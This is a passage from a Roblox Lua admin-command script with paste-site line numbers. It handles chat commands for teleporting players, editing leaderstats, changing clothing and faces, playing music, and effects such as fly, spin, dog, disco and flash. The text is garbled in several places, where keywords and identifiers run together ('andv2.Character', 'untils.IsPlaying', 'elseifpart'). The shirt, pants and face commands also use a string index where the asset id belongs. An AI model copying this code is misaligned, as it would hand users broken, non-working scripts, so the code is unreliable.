  2455. 1228.if v and game:findFirstChild("Teams") then
  2456.  
  2457. 1229.for a, tm in pairs(game.Teams:children()) do
  2458.  
  2459. 1230.if tm.Name:lower():find(msg:lower():sub(chk1+1)) == 1 then v.TeamColor = tm.TeamColor end
  2460.  
  2461. 1231.end
  2462.  
  2463. 1232.end
  2464.  
  2465. 1233.end))
  2466.  
  2467. 1234.end
  2468.  
  2469. 1235.end
  2470.  
  2471. 1236.
  2472.  
  2473. 1237.if msg:lower():sub(1,6) == "place " then
  2474.  
  2475. 1238.local chk1 = msg:lower():sub(7):find(" ") + 6
  2476.  
  2477. 1239.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  2478.  
  2479. 1240.for i, v in pairs(plrz) do
  2480.  
  2481. 1241.coroutine.resume(coroutine.create(function()
  2482.  
  2483. 1242.if v and v:findFirstChild("PlayerGui") then
  2484.  
  2485. 1243.local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] ..msg:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  2486.  
  2487. 1244.end
  2488.  
  2489. 1245.end))
  2490.  
  2491. 1246.end
  2492.  
  2493. 1247.end
  2494.  
  2495. 1248.
  2496.  
  2497. 1249.if msg:lower():sub(1,3) == "tp " then
  2498.  
  2499. 1250.local chk1 = msg:lower():sub(4):find(" ") + 3
  2500.  
  2501. 1251.local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  2502.  
  2503. 1252.local plrz2 = GetPlr(plr, msg:lower():sub(chk1+1))
  2504.  
  2505. 1253.for i, v in pairs(plrz) do
  2506.  
  2507. 1254.coroutine.resume(coroutine.create(function()
  2508.  
  2509. 1255.for i2, v2 in pairs(plrz2) do
  2510.  
  2511. 1256.if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") andv2.Character:findFirstChild("Torso") then
  2512.  
  2513. 1257.v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  2514.  
  2515. 1258.end
  2516.  
  2517. 1259.end
  2518.  
  2519. 1260.end))
  2520.  
  2521. 1261.end
  2522.  
  2523. 1262.end
  2524.  
  2525. 1263.
  2526.  
  2527. 1264.if msg:lower():sub(1,7) == "change " then
  2528.  
  2529. 1265.local chk1 = msg:lower():sub(8):find(" ") + 7
  2530.  
  2531. 1266.local chk2 = msg:sub(chk1+1):find(" ") + chk1
  2532.  
  2533. 1267.local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  2534.  
  2535. 1268.for i, v in pairs(plrz) do
  2536.  
  2537. 1269.coroutine.resume(coroutine.create(function()
  2538.  
  2539. 1270.if v and v:findFirstChild("leaderstats") then
  2540.  
  2541. 1271.for a, st in pairs(v.leaderstats:children()) do
  2542.  
  2543. 1272.if st.Name:lower():find(msg:sub(chk1+1,chk2-1)) == 1 then st.Value = msg:sub(chk2+1) end
  2544.  
  2545. 1273.end
  2546.  
  2547. 1274.end
  2548.  
  2549. 1275.end))
  2550.  
  2551. 1276.end
  2552.  
  2553. 1277.end
  2554.  
  2555. 1278.
  2556.  
  2557. 1279.if msg:lower():sub(1,6) == "shirt " then
  2558.  
  2559. 1280.local chk1 = msg:lower():sub(7):find(" ") + 6
  2560.  
  2561. 1281.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  2562.  
  2563. 1282.for i, v in pairs(plrz) do
  2564.  
  2565. 1283.coroutine.resume(coroutine.create(function()
  2566.  
  2567. 1284.if v and v.Character then
  2568.  
  2569. 1285.for i,v in pairs(v.Character:children()) do
  2570.  
  2571. 1286.if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  2572.  
  2573. 1287.end
  2574.  
  2575. 1288.end
  2576.  
  2577. 1289.end))
  2578.  
  2579. 1290.end
  2580.  
  2581. 1291.end
  2582.  
  2583. 1292.
  2584.  
  2585. 1293.if msg:lower():sub(1,6) == "pants " then
  2586.  
  2587. 1294.local chk1 = msg:lower():sub(7):find(" ") + 6
  2588.  
  2589. 1295.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  2590.  
  2591. 1296.for i, v in pairs(plrz) do
  2592.  
  2593. 1297.coroutine.resume(coroutine.create(function()
  2594.  
  2595. 1298.if v and v.Character then
  2596.  
  2597. 1299.for i,v in pairs(v.Character:children()) do
  2598.  
  2599. 1300.if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  2600.  
  2601. 1301.end
  2602.  
  2603. 1302.end
  2604.  
  2605. 1303.end))
  2606.  
  2607. 1304.end
  2608.  
  2609. 1305.end
  2610.  
  2611. 1306.
  2612.  
  2613. 1307.if msg:lower():sub(1,5) == "face " then
  2614.  
  2615. 1308.local chk1 = msg:lower():sub(6):find(" ") + 5
  2616.  
  2617. 1309.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  2618.  
  2619. 1310.for i, v in pairs(plrz) do
  2620.  
  2621. 1311.coroutine.resume(coroutine.create(function()
  2622.  
  2623. 1312.if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  2624.  
  2625. 1313.v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  2626.  
  2627. 1314.end
  2628.  
  2629. 1315.end))
  2630.  
  2631. 1316.end
  2632.  
  2633. 1317.end
  2634.  
  2635. 1318.
  2636.  
  2637. 1319.------------------
  2638.  
  2639. 1320.-- Fun Commands --
  2640.  
  2641. 1321.------------------
  2642.  
  2643. 1322.if FunCommands or plr.userId == game.CreatorId or ChkOwner(plr.Name:lower()) then
  2644.  
  2645. 1323.
  2646.  
  2647. 1324.if msg:lower():sub(1,8) == "swagify " then
  2648.  
  2649. 1325.local plrz = GetPlr(plr, msg:lower():sub(9))
  2650.  
  2651. 1326.for i, v in pairs(plrz) do
  2652.  
  2653. 1327.coroutine.resume(coroutine.create(function()
  2654.  
  2655. 1328.if v and v.Character then
  2656.  
  2657. 1329.for i,v in pairs(v.Character:children()) do
  2658.  
  2659. 1330.if v.Name == "Shirt" then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate ="http://www.roblox.com/asset/?id=109163376" v:Destroy() end
  2660.  
  2661. 1331.if v.Name == "Pants" then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate ="http://www.roblox.com/asset/?id=109163376" v:Destroy() end
  2662.  
  2663. 1332.end
  2664.  
  2665. 1333.for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  2666.  
  2667. 1334.local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  2668.  
  2669. 1335.repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  2670.  
  2671. 1336.local torso = plr.Character.Torso
  2672.  
  2673. 1337.local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  2674.  
  2675. 1338.p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474" p.formFactor = "Custom"
  2676.  
  2677. 1339.p.Size = Vector3.new(.2,.2,.2)
  2678.  
  2679. 1340.local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  2680.  
  2681. 1341.local motor1 = Instance.new("Motor", p)
  2682.  
  2683. 1342.motor1.Part0 = p
  2684.  
  2685. 1343.motor1.Part1 = torso
  2686.  
  2687. 1344.motor1.MaxVelocity = .01
  2688.  
  2689. 1345.motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  2690.  
  2691. 1346.motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  2692.  
  2693. 1347.local wave = false
  2694.  
  2695. 1348.repeat wait(1/44)
  2696.  
  2697. 1349.local ang = 0.1
  2698.  
  2699. 1350.local oldmag = torso.Velocity.magnitude
  2700.  
  2701. 1351.local mv = .002
  2702.  
  2703. 1352.if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  2704.  
  2705. 1353.ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  2706.  
  2707. 1354.motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  2708.  
  2709. 1355.motor1.DesiredAngle = -ang
  2710.  
  2711. 1356.if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  2712.  
  2713. 1357.repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  2714.  
  2715. 1358.if torso.Velocity.magnitude < .1 then wait(.1) end
  2716.  
  2717. 1359.until not p or p.Parent ~= torso.Parent
  2718.  
  2719. 1360.script:Destroy()
  2720.  
  2721. 1361.]] cl.Parent = v.PlayerGui cl.Disabled = false
  2722.  
  2723. 1362.end
  2724.  
  2725. 1363.end))
  2726.  
  2727. 1364.end
  2728.  
  2729. 1365.end
  2730.  
  2731. 1366.
  2732.  
  2733. 1367.if msg:lower():sub(1,6) == "music " then
  2734.  
  2735. 1368.for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  2736.  
  2737. 1369.local id = msg:sub(7)
  2738.  
  2739. 1370.local pitch = 1
  2740.  
  2741. 1371.if tostring(id):lower():find("caramell") then id = 2303479 end
  2742.  
  2743. 1372.if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  2744.  
  2745. 1373.if tostring(id):find("rick") then id = 2027611 end
  2746.  
  2747. 1374.if tostring(id):find("halo") then id = 1034065 end
  2748.  
  2749. 1375.if tostring(id):find("pokemon") then id = 1372261 end
  2750.  
  2751. 1376.if tostring(id):find("cursed") then id = 1372257 end
  2752.  
  2753. 1377.if tostring(id):find("extreme") then id = 11420933 end
  2754.  
  2755. 1378.if tostring(id):find("awaken") then id = 27697277 end
  2756.  
  2757. 1379.if tostring(id):find("alone") then id = 27697392 end
  2758.  
  2759. 1380.if tostring(id):find("mario") then id = 1280470 end
  2760.  
  2761. 1381.if tostring(id):find("choir") then id = 1372258 end
  2762.  
  2763. 1382.if tostring(id):find("chrono") then id = 1280463 end
  2764.  
  2765. 1383.if tostring(id):find("dotr") then id = 11420922 end
  2766.  
  2767. 1384.if tostring(id):find("entertain") then id = 27697267 end
  2768.  
  2769. 1385.if tostring(id):find("fantasy") then id = 1280473 end
  2770.  
  2771. 1386.if tostring(id):find("final") then id = 1280414 end
  2772.  
  2773. 1387.if tostring(id):find("emblem") then id = 1372259 end
  2774.  
  2775. 1388.if tostring(id):find("flight") then id = 27697719 end
  2776.  
  2777. 1389.if tostring(id):find("banjo") then id = 27697298 end
  2778.  
  2779. 1390.if tostring(id):find("gothic") then id = 27697743 end
  2780.  
  2781. 1391.if tostring(id):find("hiphop") then id = 27697735 end
  2782.  
  2783. 1392.if tostring(id):find("intro") then id = 27697707 end
  2784.  
  2785. 1393.if tostring(id):find("mule") then id = 1077604 end
  2786.  
  2787. 1394.if tostring(id):find("film") then id = 27697713 end
  2788.  
  2789. 1395.if tostring(id):find("nezz") then id = 8610025 end
  2790.  
  2791. 1396.if tostring(id):find("angel") then id = 1372260 end
  2792.  
  2793. 1397.if tostring(id):find("resist") then id = 27697234 end
  2794.  
  2795. 1398.if tostring(id):find("schala") then id = 5985787 end
  2796.  
  2797. 1399.if tostring(id):find("organ") then id = 11231513 end
  2798.  
  2799. 1400.if tostring(id):find("tunnel") then id = 9650822 end
  2800.  
  2801. 1401.if tostring(id):find("spanish") then id = 5982975 end
  2802.  
  2803. 1402.if tostring(id):find("venom") then id = 1372262 end
  2804.  
  2805. 1403.if tostring(id):find("wind") then id = 1015394 end
  2806.  
  2807. 1404.if tostring(id):find("guitar") then id = 5986151 end
  2808.  
  2809. 1405.local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() untils.IsPlaying
  2810.  
  2811. 1406.end
  2812.  
  2813. 1407.
  2814.  
  2815. 1408.if msg:lower() == "stopmusic" then
  2816.  
  2817. 1409.for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  2818.  
  2819. 1410.end
  2820.  
  2821. 1411.
  2822.  
  2823. 1412.if msg:lower() == "musiclist" then
  2824.  
  2825. 1413.if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  2826.  
  2827. 1414.local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  2828.  
  2829. 1415.local list ={"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  2830.  
  2831. 1416.for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position =UDim2.new(0,0,0,num*20) num = num +1 end
  2832.  
  2833. 1417.end
  2834.  
  2835. 1418.
  2836.  
  2837. 1419.if msg:lower():sub(1,4) == "fly " then
  2838.  
  2839. 1420.local plrz = GetPlr(plr, msg:lower():sub(5))
  2840.  
  2841. 1421.for i, v in pairs(plrz) do
  2842.  
  2843. 1422.coroutine.resume(coroutine.create(function()
  2844.  
  2845. 1423.if v and v:findFirstChild("PlayerGui") then
  2846.  
  2847. 1424.local cl = script.LocalScriptBase:Clone() cl.Name = "FlyScript" cl.Code.Value = [[repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") local mouse = game.Players.LocalPlayer:GetMouse() repeat wait() until mouse ~= nil local plr = game.Players.LocalPlayer local torso = plr.Character.Torso local flying = false local deb = true local ctrl = {f = 0, b = 0, l = 0, r = 0} local lastctrl = {f = 0, b = 0, l = 0, r = 0} local maxspeed = 50 local speed = 0 function Fly() local bg = Instance.new("BodyGyro", torso) bg.P = 9e4 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) bg.cframe = torso.CFrame local bv = Instance.new("BodyVelocity", torso) bv.velocity = Vector3.new(0,0.1,0) bv.maxForce = Vector3.new(9e9, 9e9, 9e9) repeat wait() plr.Character.Humanoid.PlatformStand = true if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then speed = speed+.5+(speed/maxspeed) if speed > maxspeed then speed = maxspeed end elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then speed = speed-1 if speed < 0 then speed = 0 end end if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r} elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed else bv.velocity = Vector3.new(0,0.1,0) end bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0) until not flying ctrl = {f = 0, b = 0, l = 0, r = 0} lastctrl = {f = 0, b = 0, l = 0, r = 0} speed = 0 bg:Destroy() bv:Destroy() plr.Character.Humanoid.PlatformStand = false end mouse.KeyDown:connect(function(key) if key:lower() == "e" then if flying then flying = false else flying = true Fly() end elseif key:lower() == "w" then ctrl.f = 1 elseif key:lower() == "s" then ctrl.b = -1 elseif key:lower() == "a" then ctrl.l = -1 elseif key:lower() == "d" then ctrl.r = 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then ctrl.f = 0 elseif key:lower() == "s" then ctrl.b = 0 elseif key:lower() == "a" then ctrl.l = 0 elseif key:lower() == "d" then ctrl.r = 0 end end)]]
  2848.  
  2849. 1425.cl.Parent = v.PlayerGui cl.Disabled = false
  2850.  
  2851. 1426.end
  2852.  
  2853. 1427.end))
  2854.  
  2855. 1428.end
  2856.  
  2857. 1429.end
  2858.  
  2859. 1430.
  2860.  
  2861. 1431.if msg:lower():sub(1,6) == "unfly " then
  2862.  
  2863. 1432.local plrz = GetPlr(plr, msg:lower():sub(7))
  2864.  
  2865. 1433.for i, v in pairs(plrz) do
  2866.  
  2867. 1434.coroutine.resume(coroutine.create(function()
  2868.  
  2869. 1435.if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") andv.Character:findFirstChild("Humanoid") then
  2870.  
  2871. 1436.for a, q in pairs(v.PlayerGui:children()) do if q.Name == "FlyScript" then q:Destroy() end end
  2872.  
  2873. 1437.for a, q in pairs(v.Character.Torso:children()) do if q.Name == "BodyGyro" or q.Name == "BodyVelocity" thenq:Destroy() end end
  2874.  
  2875. 1438.wait(.1) v.Character.Humanoid.PlatformStand = false
  2876.  
  2877. 1439.end
  2878.  
  2879. 1440.end))
  2880.  
  2881. 1441.end
  2882.  
  2883. 1442.end
  2884.  
  2885. 1443.
  2886.  
  2887. 1444.if msg:lower() == "disco" then
  2888.  
  2889. 1445.for i, v in pairs(lobjs) do v:Destroy() end
  2890.  
  2891. 1446.local cl = script.ScriptBase:Clone() cl.Name = "LightEdit" cl.Code.Value = [[repeat wait(.1) local color = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255)
  2892.  
  2893. 1447.game.Lighting.Ambient = color
  2894.  
  2895. 1448.game.Lighting.FogColor = color
  2896.  
  2897. 1449.until nil]]
  2898.  
  2899. 1450.table.insert(lobjs, cl) cl.Parent = game.Workspace cl.Disabled = false
  2900.  
  2901. 1451.end
  2902.  
  2903. 1452.
  2904.  
  2905. 1453.if msg:lower() == "flash" then
  2906.  
  2907. 1454.for i, v in pairs(lobjs) do v:Destroy() end
  2908.  
  2909. 1455.local cl = script.ScriptBase:Clone() cl.Name = "LightEdit" cl.Code.Value = [[repeat wait(.1)
  2910.  
  2911. 1456.game.Lighting.Ambient = Color3.new(1,1,1)
  2912.  
  2913. 1457.game.Lighting.FogColor = Color3.new(1,1,1)
  2914.  
  2915. 1458.game.Lighting.Brightness = 1
  2916.  
  2917. 1459.game.Lighting.TimeOfDay = 14
  2918.  
  2919. 1460.wait(.1)
  2920.  
  2921. 1461.game.Lighting.Ambient = Color3.new(0,0,0)
  2922.  
  2923. 1462.game.Lighting.FogColor = Color3.new(0,0,0)
  2924.  
  2925. 1463.game.Lighting.Brightness = 0
  2926.  
  2927. 1464.game.Lighting.TimeOfDay = 0
  2928.  
  2929. 1465.until nil]]
  2930.  
  2931. 1466.table.insert(lobjs, cl) cl.Parent = game.Workspace cl.Disabled = false
  2932.  
  2933. 1467.end
  2934.  
  2935. 1468.
  2936.  
  2937. 1469.if msg:lower():sub(1,5) == "spin " then
  2938.  
  2939. 1470.local plrz = GetPlr(plr, msg:lower():sub(6))
  2940.  
  2941. 1471.for i, v in pairs(plrz) do
  2942.  
  2943. 1472.coroutine.resume(coroutine.create(function()
  2944.  
  2945. 1473.if v and v.Character and v.Character:findFirstChild("Torso") then
  2946.  
  2947. 1474.for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  2948.  
  2949. 1475.local torso = v.Character:findFirstChild("Torso")
  2950.  
  2951. 1476.local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P =11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  2952.  
  2953. 1477.repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  2954.  
  2955. 1478.until not bg or bg.Parent ~= torso
  2956.  
  2957. 1479.end
  2958.  
  2959. 1480.end))
  2960.  
  2961. 1481.end
  2962.  
  2963. 1482.end
  2964.  
  2965. 1483.
  2966.  
  2967. 1484.if msg:lower():sub(1,7) == "unspin " then
  2968.  
  2969. 1485.local plrz = GetPlr(plr, msg:lower():sub(8))
  2970.  
  2971. 1486.for i, v in pairs(plrz) do
  2972.  
  2973. 1487.coroutine.resume(coroutine.create(function()
  2974.  
  2975. 1488.if v and v.Character and v.Character:findFirstChild("Torso") then
  2976.  
  2977. 1489.for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  2978.  
  2979. 1490.end
  2980.  
  2981. 1491.end))
  2982.  
  2983. 1492.end
  2984.  
  2985. 1493.end
  2986.  
  2987. 1494.
  2988.  
  2989. 1495.if msg:lower():sub(1,4) == "dog " then
  2990.  
  2991. 1496.local plrz = GetPlr(plr, msg:lower():sub(5))
  2992.  
  2993. 1497.for i, v in pairs(plrz) do
  2994.  
  2995. 1498.coroutine.resume(coroutine.create(function()
  2996.  
  2997. 1499.if v and v.Character and v.Character:findFirstChild("Torso") then
  2998.  
  2999. 1500.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  3000.  
  3001. 1501.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  3002.  
  3003. 1502.v.Character.Torso.Transparency = 1
  3004.  
  3005. 1503.v.Character.Torso.Neck.C0 = CFrame.new(0,-.5,-2) * CFrame.Angles(math.rad(90),math.rad(180),0)
  3006.  
  3007. 1504.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(.5,-1.5,-1.5) * CFrame.Angles(0,math.rad(90),0)
  3008.  
  3009. 1505.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-.5,-1.5,-1.5) * CFrame.Angles(0,math.rad(-90),0)
  3010.  
  3011. 1506.v.Character.Torso["Right Hip"].C0 = CFrame.new(1.5,-1,1.5) * CFrame.Angles(0,math.rad(90),0)
  3012.  
  3013. 1507.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1.5,-1,1.5) * CFrame.Angles(0,math.rad(-90),0)
  3014.  
  3015. 1508.local new = Instance.new("Seat", v.Character) new.Name = "FAKETORSO" new.formFactor = "Symmetric" new.TopSurface =0 new.BottomSurface = 0 new.Size = Vector3.new(3,1,4) new.CFrame = v.Character.Torso.CFrame
  3016.  
  3017. 1509.local bf = Instance.new("BodyForce", new) bf.force = Vector3.new(0,new:GetMass()*196.25,0)
  3018.  
  3019. 1510.local weld = Instance.new("Weld", v.Character.Torso) weld.Part0 = v.Character.Torso weld.Part1 = new weld.C0 =CFrame.new(0,-.5,0)
  3020.  
  3021. 1511.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor =BrickColor.new("Brown") elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("Brown")end end
  3022.  
  3023. 1512.end
  3024.  
  3025. 1513.end))
  3026.  
  3027. 1514.end
  3028.  
  3029. 1515.end
  3030.  
  3031. 1516.
  3032.  
  3033. 1517.if msg:lower():sub(1,6) == "undog " then
  3034.  
  3035. 1518.local plrz = GetPlr(plr, msg:lower():sub(7))
  3036.  
  3037. 1519.for i, v in pairs(plrz) do
  3038.  
  3039. 1520.coroutine.resume(coroutine.create(function()
  3040.  
  3041. 1521.if v and v.Character and v.Character:findFirstChild("Torso") then
  3042.  
  3043. 1522.if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  3044.  
  3045. 1523.if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  3046.  
  3047. 1524.v.Character.Torso.Transparency = 0
  3048.  
  3049. 1525.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  3050.  
  3051. 1526.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  3052.  
  3053. 1527.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  3054.  
  3055. 1528.v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  3056.  
  3057. 1529.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  3058.  
  3059. 1530.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor =BrickColor.new("White") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag")then part.Head.BrickColor = BrickColor.new("White") end end
  3060.  
  3061. 1531.end
  3062.  
  3063. 1532.end))
  3064.  
  3065. 1533.end
  3066.  
  3067. 1534.end
  3068.  
  3069. 1535.
  3070.  
  3071. 1536.if msg:lower():sub(1,8) == "creeper " then
  3072.  
  3073. 1537.local plrz = GetPlr(plr, msg:lower():sub(9))
  3074.  
  3075. 1538.for i, v in pairs(plrz) do
  3076.  
  3077. 1539.coroutine.resume(coroutine.create(function()
  3078.  
  3079. 1540.if v and v.Character and v.Character:findFirstChild("Torso") then
  3080.  
  3081. 1541.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  3082.  
  3083. 1542.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  3084.  
  3085. 1543.v.Character.Torso.Transparency = 0
  3086.  
  3087. 1544.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  3088.  
  3089. 1545.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(0,-1.5,-.5) * CFrame.Angles(0,math.rad(90),0)
  3090.  
  3091. 1546.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(0,-1.5,-.5) * CFrame.Angles(0,math.rad(-90),0)
  3092.  
  3093. 1547.v.Character.Torso["Right Hip"].C0 = CFrame.new(0,-1,.5) * CFrame.Angles(0,math.rad(90),0)
  3094.  
  3095. 1548.v.Character.Torso["Left Hip"].C0 = CFrame.new(0,-1,.5) * CFrame.Angles(0,math.rad(-90),0)
  3096.  
  3097. 1549.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor =BrickColor.new("Bright green") if part.Name == "FAKETORSO" then part:Destroy() end elseifpart:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("Bright green") end end
  3098.  
  3099. 1550.end
  3100.  
  3101. 1551.end))
  3102.  
  3103. 1552.end
  3104.  
  3105. 1553.end
  3106.  
  3107. 1554.
  3108.  
  3109. 1555.if msg:lower():sub(1,10) == "uncreeper " then
  3110.  
  3111. 1556.local plrz = GetPlr(plr, msg:lower():sub(11))
  3112.  
  3113. 1557.for i, v in pairs(plrz) do
  3114.  
  3115. 1558.coroutine.resume(coroutine.create(function()
  3116.  
  3117. 1559.if v and v.Character and v.Character:findFirstChild("Torso") then
  3118.  
  3119. 1560.if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  3120.  
  3121. 1561.if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  3122.  
  3123. 1562.v.Character.Torso.Transparency = 0
  3124.  
  3125. 1563.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  3126.  
  3127. 1564.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  3128.  
  3129. 1565.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  3130.  
  3131. 1566.v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  3132.  
  3133. 1567.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  3134.  
  3135. 1568.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor =BrickColor.new("White") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag")then part.Head.BrickColor = BrickColor.new("White") end end
  3136.  
  3137. 1569.end
  3138.  
  3139. 1570.end))
  3140.  
  3141. 1571.end
  3142.  
  3143. 1572.end
  3144.  
  3145. 1573.
  3146.  
  3147. 1574.if msg:lower():sub(1,8) == "bighead " then
  3148.  
  3149. 1575.local plrz = GetPlr(plr, msg:lower():sub(9))
  3150.  
  3151. 1576.for i, v in pairs(plrz) do
  3152.  
  3153. 1577.coroutine.resume(coroutine.create(function()
  3154.  
  3155. 1578.if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 =CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  3156.  
  3157. 1579.end))
  3158.  
  3159. 1580.end
  3160.  
  3161. 1581.end
  3162.  
  3163. 1582.
  3164.  
